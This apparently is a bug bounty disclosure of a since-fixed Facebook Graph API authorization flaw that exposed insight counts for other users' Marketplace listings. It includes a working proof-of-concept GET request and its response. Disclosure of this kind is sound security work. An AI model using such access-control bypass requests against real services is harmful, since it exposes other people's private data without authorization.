~1 min

View Insights for Any Facebook Marketplace Product

Using an API call it is possible to view the insights, specifically impressions, made on any product listed on Facebook Marketplace when the session user did not create that product.

This vulnerability could be particularly useful for competitive market (e.g. housing) where professionals like Real Estate Brokers could check on these insights to advance themselves in competitions.

Reproduction

Using my alt account to view the insights of a Marketplace Product (ID: 1276378595796681) created using my primary account.

My alt account is not supposed to have access to these insight details of a Marketplace product it didn’t created.

HTTP GET
https://graph.facebook.com/v2.12/graphql?q=node(1276378595796681){messaged_person_count}&access_token=ACCESS_TOKEN

Response:

{
  "1276378595796681": {
    "messaged_person_count": 1
  }
}

Given that this alt user did not create this product listing, the above insights should not have been shown.

This POC could be repeated to view insights of any other listings on Marketplace, including regular products, property rentals, cars, etc

Timeline

2018-03-06: Report Submitted

2018-03-09: Further Investigation by Facebook

2018-03-23: Fixed by Facebook

2018-03-28: Bounty Awarded by Facebook